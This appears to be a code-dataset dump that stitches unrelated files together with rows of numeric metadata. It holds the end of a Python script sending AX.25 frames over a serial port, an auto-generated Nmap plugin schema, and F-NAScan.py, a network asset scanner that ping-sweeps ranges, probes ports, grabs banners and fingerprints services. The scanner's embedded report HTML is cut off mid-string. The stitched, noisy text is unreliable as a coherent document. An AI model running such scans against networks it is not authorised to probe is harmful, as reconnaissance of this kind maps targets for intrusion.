# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x1c\x05\x3e\xf0\x7b\x8d\x3f\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf5\xcb\xce\x8b\xf9\x14\xee\x02\xf2\x08\x6a\x29\x13\xac\xbc\x1d\x7e\x7e")
# FRAME TO CHANGE BEACON FREQUENCY to 2^32 ms
#ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x1c\x05\x3e\xf0\x8e\x46\xfe\x2d\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\x27\xb0\xcd\x07\x39\xc6\xee\x83\x1d\x7e\x7e")
print "SENT"
# Wait for confirmation
print "Waiting for confirmation..."
response = ser.read(90)
print ' '.join(x.encode('hex') for x in response)
print "CONFIRMED"
while True:
b = ser.read()
print b.encode("hex") ,
ser.close()
# python ccs_workspace\odiseo-hemisferioDerecho\utils\ax25_test.py
| 116.34
| 759
| 0.741276
| 1,370
| 5,817
| 3.145985
| 0.132847
| 0.112761
| 0.169142
| 0.175406
| 0.844548
| 0.844548
| 0.835035
| 0.824826
| 0.805104
| 0.787007
| 0
| 0.257434
| 0.023036
| 5,817
| 49
| 760
| 118.714286
| 0.500968
| 0.941035
| 0
| 0
| 0
| 0
| 0.224299
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.083333
| null | null | 0.5
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
80b7501a1f89d01b15591d96bfe1ee0d1f870f27
| 19,078
|
py
|
Python
|
nmap/komand_nmap/actions/scan/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
nmap/komand_nmap/actions/scan/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
nmap/komand_nmap/actions/scan/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
# GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Input:
ARGUMENTS = "arguments"
HOSTS = "hosts"
PORTS = "ports"
SUDO = "sudo"
class Output:
RESULT = "result"
class ScanInput(komand.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"arguments": {
"type": "string",
"title": "Arguments",
"description": "Arguments to supply to the Nmap command",
"order": 3
},
"hosts": {
"type": "string",
"title": "Hosts",
"description": "Host(s) to scan in Nmap-allowed formats",
"order": 1
},
"ports": {
"type": "string",
"title": "Ports",
"description": "Port(s) to scan in Nmap-allowed formats",
"order": 2
},
"sudo": {
"type": "boolean",
"title": "Sudo",
"description": "Whether or not to use superuser privileges for scan, e.g. -sS requires superuser privileges but -sT does not",
"default": false,
"order": 4
}
},
"required": [
"hosts",
"sudo"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class ScanOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"result": {
"type": "array",
"title": "Output Results",
"description": "Scan results",
"items": {
"$ref": "#/definitions/host"
},
"order": 1
}
},
"definitions": {
"addresses": {
"type": "object",
"title": "addresses",
"properties": {
"ipv4": {
"type": "string",
"title": "IPv4",
"description": "IPv4 Address",
"order": 1
},
"ipv6": {
"type": "string",
"title": "IPv6",
"description": "IPv6 Address",
"order": 2
}
}
},
"host": {
"type": "object",
"title": "host",
"properties": {
"addresses": {
"$ref": "#/definitions/addresses",
"title": "Addresses",
"description": "Addresses",
"order": 1
},
"hostnames": {
"type": "array",
"title": "Hostnames",
"description": "Hostnames",
"items": {
"$ref": "#/definitions/hostname"
},
"order": 2
},
"osmatch": {
"type": "array",
"title": "OS Matches",
"description": "OS matches",
"items": {
"$ref": "#/definitions/osmatch"
},
"order": 3
},
"status": {
"$ref": "#/definitions/status",
"title": "Status",
"description": "Status of the host",
"order": 4
},
"tcp": {
"type": "array",
"title": "TCP",
"description": "TCP ports",
"items": {
"$ref": "#/definitions/tcp"
},
"order": 5
},
"udp": {
"type": "array",
"title": "UDP",
"description": "UDP ports",
"items": {
"$ref": "#/definitions/udp"
},
"order": 6
},
"vendor": {
"type": "object",
"title": "Vendor",
"description": "Vendor",
"order": 7
}
},
"definitions": {
"addresses": {
"type": "object",
"title": "addresses",
"properties": {
"ipv4": {
"type": "string",
"title": "IPv4",
"description": "IPv4 Address",
"order": 1
},
"ipv6": {
"type": "string",
"title": "IPv6",
"description": "IPv6 Address",
"order": 2
}
}
},
"hostname": {
"type": "object",
"title": "hostname",
"properties": {
"name": {
"type": "string",
"title": "Hostname",
"description": "Hostname",
"order": 1
},
"type": {
"type": "string",
"title": "Type",
"description": "Type, eg. PTR",
"order": 2
}
}
},
"osclass": {
"type": "object",
"title": "osclass",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"cpe": {
"type": "array",
"title": "CPEs",
"description": "Common Platform Enumeration addresses",
"items": {
"type": "string"
},
"order": 2
},
"osfamily": {
"type": "string",
"title": "OS Family, eg. embedded",
"description": "OS family",
"order": 3
},
"osgen": {
"type": "string",
"title": "OS Generation",
"description": "OS Generation, eg. 10.7.x (for MacOS)",
"order": 4
},
"type": {
"type": "string",
"title": "Type",
"description": "Type of OS",
"order": 5
},
"vendor": {
"type": "string",
"title": "Vendor",
"description": "Vendor",
"order": 6
}
}
},
"osmatch": {
"type": "object",
"title": "osmatch",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"line": {
"type": "string",
"title": "Line",
"description": "Line",
"order": 2
},
"name": {
"type": "string",
"title": "Name",
"description": "Name",
"order": 3
},
"osclass": {
"type": "array",
"title": "OS Class",
"description": "OS class",
"items": {
"$ref": "#/definitions/osclass"
},
"order": 4
}
},
"definitions": {
"osclass": {
"type": "object",
"title": "osclass",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"cpe": {
"type": "array",
"title": "CPEs",
"description": "Common Platform Enumeration addresses",
"items": {
"type": "string"
},
"order": 2
},
"osfamily": {
"type": "string",
"title": "OS Family, eg. embedded",
"description": "OS family",
"order": 3
},
"osgen": {
"type": "string",
"title": "OS Generation",
"description": "OS Generation, eg. 10.7.x (for MacOS)",
"order": 4
},
"type": {
"type": "string",
"title": "Type",
"description": "Type of OS",
"order": 5
},
"vendor": {
"type": "string",
"title": "Vendor",
"description": "Vendor",
"order": 6
}
}
}
}
},
"status": {
"type": "object",
"title": "status",
"properties": {
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 1
},
"state": {
"type": "string",
"title": "State",
"description": "State eg. up",
"order": 2
}
}
},
"tcp": {
"type": "object",
"title": "tcp",
"properties": {
"conf": {
"type": "string",
"title": "Configuration",
"description": "Conf",
"order": 1
},
"cpe": {
"type": "string",
"title": "CPE",
"description": "Common Platform Enumeration address",
"order": 2
},
"extrainfo": {
"type": "string",
"title": "Extra Info",
"description": "Extra info",
"order": 3
},
"name": {
"type": "string",
"title": "Name",
"description": "Port name",
"order": 4
},
"port": {
"type": "integer",
"title": "Port",
"description": "Port number",
"order": 5
},
"product": {
"type": "string",
"title": "Product",
"description": "Product",
"order": 6
},
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 7
},
"state": {
"type": "string",
"title": "State",
"description": "State of port, eg. open",
"order": 8
},
"version": {
"type": "string",
"title": "Version",
"description": "Version",
"order": 9
}
}
},
"udp": {
"type": "object",
"title": "udp",
"properties": {
"conf": {
"type": "string",
"title": "Configuration",
"description": "Conf",
"order": 1
},
"cpe": {
"type": "string",
"title": "CPE",
"description": "Common Platform Enumeration address",
"order": 2
},
"extrainfo": {
"type": "string",
"title": "Extra Info",
"description": "Extra info",
"order": 3
},
"name": {
"type": "string",
"title": "Name",
"description": "Port name",
"order": 4
},
"port": {
"type": "integer",
"title": "Port",
"description": "Port number",
"order": 5
},
"product": {
"type": "string",
"title": "Product",
"description": "Product",
"order": 6
},
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 7
},
"state": {
"type": "string",
"title": "State",
"description": "State of port, eg. open",
"order": 8
},
"version": {
"type": "string",
"title": "Version",
"description": "Version",
"order": 9
}
}
}
}
},
"hostname": {
"type": "object",
"title": "hostname",
"properties": {
"name": {
"type": "string",
"title": "Hostname",
"description": "Hostname",
"order": 1
},
"type": {
"type": "string",
"title": "Type",
"description": "Type, eg. PTR",
"order": 2
}
}
},
"osclass": {
"type": "object",
"title": "osclass",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"cpe": {
"type": "array",
"title": "CPEs",
"description": "Common Platform Enumeration addresses",
"items": {
"type": "string"
},
"order": 2
},
"osfamily": {
"type": "string",
"title": "OS Family, eg. embedded",
"description": "OS family",
"order": 3
},
"osgen": {
"type": "string",
"title": "OS Generation",
"description": "OS Generation, eg. 10.7.x (for MacOS)",
"order": 4
},
"type": {
"type": "string",
"title": "Type",
"description": "Type of OS",
"order": 5
},
"vendor": {
"type": "string",
"title": "Vendor",
"description": "Vendor",
"order": 6
}
}
},
"osmatch": {
"type": "object",
"title": "osmatch",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"line": {
"type": "string",
"title": "Line",
"description": "Line",
"order": 2
},
"name": {
"type": "string",
"title": "Name",
"description": "Name",
"order": 3
},
"osclass": {
"type": "array",
"title": "OS Class",
"description": "OS class",
"items": {
"$ref": "#/definitions/osclass"
},
"order": 4
}
},
"definitions": {
"osclass": {
"type": "object",
"title": "osclass",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"cpe": {
"type": "array",
"title": "CPEs",
"description": "Common Platform Enumeration addresses",
"items": {
"type": "string"
},
"order": 2
},
"osfamily": {
"type": "string",
"title": "OS Family, eg. embedded",
"description": "OS family",
"order": 3
},
"osgen": {
"type": "string",
"title": "OS Generation",
"description": "OS Generation, eg. 10.7.x (for MacOS)",
"order": 4
},
"type": {
"type": "string",
"title": "Type",
"description": "Type of OS",
"order": 5
},
"vendor": {
"type": "string",
"title": "Vendor",
"description": "Vendor",
"order": 6
}
}
}
}
},
"status": {
"type": "object",
"title": "status",
"properties": {
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 1
},
"state": {
"type": "string",
"title": "State",
"description": "State eg. up",
"order": 2
}
}
},
"tcp": {
"type": "object",
"title": "tcp",
"properties": {
"conf": {
"type": "string",
"title": "Configuration",
"description": "Conf",
"order": 1
},
"cpe": {
"type": "string",
"title": "CPE",
"description": "Common Platform Enumeration address",
"order": 2
},
"extrainfo": {
"type": "string",
"title": "Extra Info",
"description": "Extra info",
"order": 3
},
"name": {
"type": "string",
"title": "Name",
"description": "Port name",
"order": 4
},
"port": {
"type": "integer",
"title": "Port",
"description": "Port number",
"order": 5
},
"product": {
"type": "string",
"title": "Product",
"description": "Product",
"order": 6
},
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 7
},
"state": {
"type": "string",
"title": "State",
"description": "State of port, eg. open",
"order": 8
},
"version": {
"type": "string",
"title": "Version",
"description": "Version",
"order": 9
}
}
},
"udp": {
"type": "object",
"title": "udp",
"properties": {
"conf": {
"type": "string",
"title": "Configuration",
"description": "Conf",
"order": 1
},
"cpe": {
"type": "string",
"title": "CPE",
"description": "Common Platform Enumeration address",
"order": 2
},
"extrainfo": {
"type": "string",
"title": "Extra Info",
"description": "Extra info",
"order": 3
},
"name": {
"type": "string",
"title": "Name",
"description": "Port name",
"order": 4
},
"port": {
"type": "integer",
"title": "Port",
"description": "Port number",
"order": 5
},
"product": {
"type": "string",
"title": "Product",
"description": "Product",
"order": 6
},
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 7
},
"state": {
"type": "string",
"title": "State",
"description": "State of port, eg. open",
"order": 8
},
"version": {
"type": "string",
"title": "Version",
"description": "Version",
"order": 9
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| 25.676985
| 132
| 0.35119
| 1,261
| 19,078
| 5.294211
| 0.099128
| 0.115339
| 0.16402
| 0.022768
| 0.838376
| 0.833433
| 0.833433
| 0.833433
| 0.809167
| 0.809167
| 0
| 0.011682
| 0.479505
| 19,078
| 742
| 133
| 25.71159
| 0.660624
| 0.001939
| 0
| 0.725034
| 1
| 0.001368
| 0.976732
| 0.007458
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002736
| false
| 0
| 0.002736
| 0
| 0.02052
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
038c0784ed4216ab56c12b34d29cfd1226bd4e18
| 145,367
|
py
|
Python
|
python/F-NAScan.py
|
mabangde/pentesttools
|
0db14c490e62d5db4b184c46e0af2d2f8c1861f2
|
[
"Linux-OpenIB"
] | 142
|
2019-09-09T01:34:31.000Z
|
2022-01-21T14:24:22.000Z
|
python/F-NAScan.py
|
gcxtx/pentesttools
|
28cf92c4e2742dd260d40c149614daa022bad8ec
|
[
"Linux-OpenIB"
] | null | null | null |
python/F-NAScan.py
|
gcxtx/pentesttools
|
28cf92c4e2742dd260d40c149614daa022bad8ec
|
[
"Linux-OpenIB"
] | 39
|
2019-09-09T02:03:07.000Z
|
2022-03-22T03:22:19.000Z
|
#coding:utf-8
#author:wolf@future-sec
import getopt,sys,Queue,threading,socket,struct,urllib2,time,os,re,json,base64,cgi,array,ssl
queue = Queue.Queue()
mutex = threading.Lock()
timeout = 10
port_list = []
re_data = {}
port_data = {}
statistics = {}
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
pass
else:
ssl._create_default_https_context = _create_unverified_https_context
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode("utf-8")
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
class SendPingThr(threading.Thread):
def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3):
threading.Thread.__init__(self)
self.Sock = icmpSocket
self.ipPool = ipPool
self.packet = icmpPacket
self.timeout = timeout
self.Sock.settimeout(timeout + 1)
def run(self):
time.sleep(0.01)
for ip in self.ipPool:
try:
self.Sock.sendto(self.packet, (ip, 0))
except socket.timeout:
break
time.sleep(self.timeout)
class Nscan:
def __init__(self, timeout=3):
self.timeout = timeout
self.__data = struct.pack('d', time.time())
self.__id = os.getpid()
@property
def __icmpSocket(self):
Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
return Sock
def __inCksum(self, packet):
if len(packet) & 1:
packet = packet + '\0'
words = array.array('h', packet)
sum = 0
for word in words:
sum += (word & 0xffff)
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
return (~sum) & 0xffff
@property
def __icmpPacket(self):
header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0)
packet = header + self.__data
chkSum = self.__inCksum(packet)
header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0)
return header + self.__data
def mPing(self, ipPool):
Sock = self.__icmpSocket
Sock.settimeout(self.timeout)
packet = self.__icmpPacket
recvFroms = set()
sendThr = SendPingThr(ipPool, packet, Sock, self.timeout)
sendThr.start()
while True:
try:
ac_ip = Sock.recvfrom(1024)[1][0]
if ac_ip not in recvFroms:
log("active",ac_ip,0)
recvFroms.add(ac_ip)
except Exception:
pass
finally:
if not sendThr.isAlive():
break
return recvFroms & ipPool
def get_ac_ip(ip_list):
try:
s = Nscan()
ipPool = set(ip_list)
return s.mPing(ipPool)
except:
print 'The current user permissions unable to send icmp packets'
return ip_list
class ThreadNum(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
try:
if queue.empty():break
queue_task = self.queue.get()
except:
break
try:
task_host,task_port = queue_task.split(":")
data = scan_port(task_host,task_port)
if data:
if data <> 'NULL':
port_data[task_host + ":" + task_port] = urllib2.quote(data)
server_type = server_discern(task_host,task_port,data)
if not server_type:
h_server,title = get_web_info(task_host,task_port)
if title or h_server:server_type = 'web ' + title
if server_type:log('server',task_host,task_port,server_type.strip())
except Exception,e:
continue
def get_code(header,html):
try:
m = re.search(r'<meta.*?charset\=(.*?)"(>| |\/)',html, flags=re.I)
if m:
return m.group(1).replace('"','')
except:
pass
try:
if header.has_key('Content-Type'):
Content_Type = header['Content-Type']
m = re.search(r'.*?charset\=(.*?)(;|$)',Content_Type,flags=re.I)
if m:return m.group(1)
except:
pass
def get_web_info(host,port):
h_server,h_xpb,title_str,html = '','','',''
try:
info = urllib2.urlopen("http://%s:%s"%(host,port),timeout=timeout)
html = info.read()
header = info.headers
except urllib2.HTTPError,e:
header = e.headers
except Exception,e:
return False,False
if not header:return False,False
try:
html_code = get_code(header,html).strip()
if html_code and len(html_code) < 12:
html = html.decode(html_code).encode('utf-8')
except:
pass
try:
port_data[host + ":" + str(port)] = urllib2.quote(str(header) + "\r\n\r\n" + cgi.escape(html))
title = re.search(r'<title>(.*?)</title>', html, flags=re.I|re.M)
if title:title_str=title.group(1)
except Exception,e:
pass
return str(header),title_str
def scan_port(host,port):
try:
socket.setdefaulttimeout(timeout/2)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((str(host),int(port)))
log('portscan',host,port)
except Exception,e:
return False
try:
data = sock.recv(512)
sock.close()
if len(data) > 2:
return data
else:
return 'NULL'
except Exception,e:
return 'NULL'
def log(scan_type,host,port,info=''):
mutex.acquire()
try:
time_str = time.strftime('%X', time.localtime(time.time()))
if scan_type == 'portscan':
print "[%s] %s:%d open"%(time_str,host,int(port))
try:
re_data[host].append(port)
except KeyError:
re_data[host]=[]
re_data[host].append(port)
elif scan_type == 'server':
print "[%s] %s:%d is %s"%(time_str,host,int(port),str(info))
try:
server = info.split(" ")[0].replace("(default)","")
statistics[server] += 1
except KeyError:
statistics[server] = 1
re_data[host].remove(port)
re_data[host].append(str(port) + " " + str(info))
elif scan_type == 'active':
print "[%s] %s active"%(time_str,host)
except Exception,e:
pass
mutex.release()
def read_config(config_type):
if config_type == 'server_info':
mark_list=[]
try:
config_file = open('server_info.ini','r')
for mark in config_file:
name,port,reg = mark.strip().split("|",2)
mark_list.append([name,port,reg])
config_file.close()
return mark_list
except:
print 'Configuration file read failed'
exit()
def server_discern(host,port,data):
server = ''
for mark_info in mark_list:
try:
name,default_port,reg = mark_info
if int(default_port) == int(port):server = name+"(default)"
if reg and data <> 'NULL':
matchObj = re.search(reg,data,re.I|re.M)
if matchObj:server = name
if server:
return server
except Exception,e:
continue
return server
def get_ip_list(ip):
ip_list = []
iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
if '-' in ip:
ip_range = ip.split('-')
ip_start = long(iptonum(ip_range[0]))
ip_end = long(iptonum(ip_range[1]))
ip_count = ip_end - ip_start
if ip_count >= 0 and ip_count <= 65536:
for ip_num in range(ip_start,ip_end+1):
ip_list.append(numtoip(ip_num))
else:
print '-h wrong format'
elif '.ini' in ip:
ip_config = open(ip,'r')
for ip in ip_config:
ip_list.extend(get_ip_list(ip.strip()))
ip_config.close()
else:
ip_split=ip.split('.')
net = len(ip_split)
if net == 2:
for b in range(1,255):
for c in range(1,255):
ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c)
ip_list.append(ip)
elif net == 3:
for c in range(1,255):
ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c)
ip_list.append(ip)
elif net ==4:
ip_list.append(ip)
else:
print "-h wrong format"
return ip_list
def get_port_list(port):
port_list = []
if '.ini' in port:
port_config = open(port,'r')
for port in port_config:
port_list.append(port.strip())
port_config.close()
else:
port_list = port.split(',')
return port_list
def write_result():
re_json = []
re_array = {}
td = ''
try:
ip_list = re_data.keys()
ip_list.sort()
for ip_str in ip_list:
port_array = []
for port_str in re_data[ip_str]:
port_array.append({"name":port_str,"url":"javascript:view('%s');"%(ip_str + ":" + port_str.split(" ")[0])})
ip_array = {"name":ip_str,"submenu":port_array}
if re_array.has_key(ip_str[0:ip_str.rindex('.')]+'.*'):
re_array[ip_str[0:ip_str.rindex('.')]+'.*'].append(ip_array)
else:
re_array[ip_str[0:ip_str.rindex('.')]+'.*']=[]
re_array[ip_str[0:ip_str.rindex('.')]+'.*'].append(ip_array)
for ip_c in re_array:
re_json.append({"name":ip_c,'submenu':re_array[ip_c]})
for server in statistics:
td += "<tr><td align='center'>%s</td><td align='center'>%d</td></tr>"%(server,statistics[server])
td_html = "<table><tr><th>Service</th><th>Count</th></tr>" + td + "</table>"
if re_json:
mo_html = base64.b64decode("<!doctype html>
<html>
	<head>
	<meta charset="UTF-8">
	<title>网络资产信息列表</title>
 	<style type="text/css">
		.wrap-menu{overflow-x:hidden;overflow-y:auto;min-width:25%;max-width:35%;background:#f6f6f6;font:12px/1.5 Tahoma,Arial,sans-serif;float:left;margin:10px}.wrap-menu ul{list-style:none;margin:0;padding:0}.wrap-menu ul li{text-indent:3em;white-space:nowrap}.wrap-menu ul li h2{cursor:pointer;height:100%;width:100%;margin:0 0 1px 0;font:12px/31px '宋体';color:#fff;background:#adadad}.wrap-menu ul li a{display:block;outline:0;height:25px;line-height:25px;margin:1px 0;color:#1a385c;text-decoration:none}.wrap-menu ul li img{margin-right:10px;margin-left:-17px;margin-top:9px;width:7px;height:7px;background-image:url(data:image/gif;base64,R0lGODlhBwAOALMMAEyEpUqEqUmEpkmFqUqFp0mEpEmDqUiEpkiFpEuDpkeDp0aFpv///wAAAAAAAAAAACH/C1hNUCBEYXRhWE1QPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS4wLWMwNjAgNjEuMTM0Nzc3LCAyMDEwLzAyLzEyLTE3OjMyOjAwICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOnhtcE1NPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvbW0vIiB4bWxuczpzdFJlZj0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL3NUeXBlL1Jlc291cmNlUmVmIyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ1M1IFdpbmRvd3MiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6RUE3MTQ1RjcyNEJCMTFFMjhBOTc4Q0QxQTI5RkIxOTUiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6RUE3MTQ1RjgyNEJCMTFFMjhBOTc4Q0QxQTI5RkIxOTUiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDpFQTcxNDVGNTI0QkIxMUUyOEE5NzhDRDFBMjlGQjE5NSIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDpFQTcxNDVGNjI0QkIxMUUyOEE5NzhDRDFBMjlGQjE5NSIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PgH//v38+/r5+Pf29fTz8vHw7+7t7Ovq6ejn5uXk4+Lh4N/e3dzb2tnY19bV1NPS0dDPzs3My8rJyMfGxcTDwsHAv769vLu6ubi3trW0s7KxsK+urayrqqmop6alpKOioaCfnp2cm5qZmJeWlZSTkpGQj46NjIuKiYiHhoWEg4KBgH9+fXx7enl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmFgX15dXFtaWVhXVlVUU1JRUE9OTUxLSklIR0ZFRENCQUA/Pj08Ozo5ODc2NTQzMjEwLy4tLCsqKSgnJiUkIyIhIB8eHRwbGhkYFxYVFBMSERAPDg0MCwoJCAcGBQQDAgEAACH5BAEAAAwALAAAAAAHAA4AQAQfkEkgq7Ug13HCzVQVMoQSJIBBiOMEslccF4KwINZQRQA7);border:0}.wrap-menu ul li img.unfold{background-position:0 -9px}.wrap-menu ul li a:hover{background-color:#ccc;background-image:none}.wrap-data{overflow:auto;min-height:500px;min-width:40%;max-width:60%;background:#f6f6f6;font:12px/1.5 Tahoma,Arial,sans-serif;float:left;margin:10px;padding:10px 5px 15px 20px}
	</style>
	<script>
	(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H))};b.fn=b.prototype={jquery:p,constructor:b,init:function(e,n,r){var i,a;if(!e)return this;if("string"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:N.exec(e),!i||!i[1]&&n)return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanceof b?n[0]:n,b.merge(this,b.parseHTML(i[1],n&&n.nodeType?n.ownerDocument||n:o,!0)),C.test(i[1])&&b.isPlainObject(n))for(i in n)b.isFunction(this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(a=o.getElementById(i[2]),a&&a.parentNode){if(a.id!==i[2])return r.find(e);this.length=1,this[0]=a}return this.context=o,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):b.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),b.makeArray(e,this))},selector:"",length:0,size:function(){return this.length},toArray:function(){return h.call(this)},get:function(e){return null==e?this.toArray():0>e?this[this.length+e]:this[e]},pushStack:function(e){var t=b.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return b.each(this,e,t)},ready:function(e){return b.ready.promise().done(e),this},slice:function(){return this.pushStack(h.apply(this,arguments))},first:function(){return 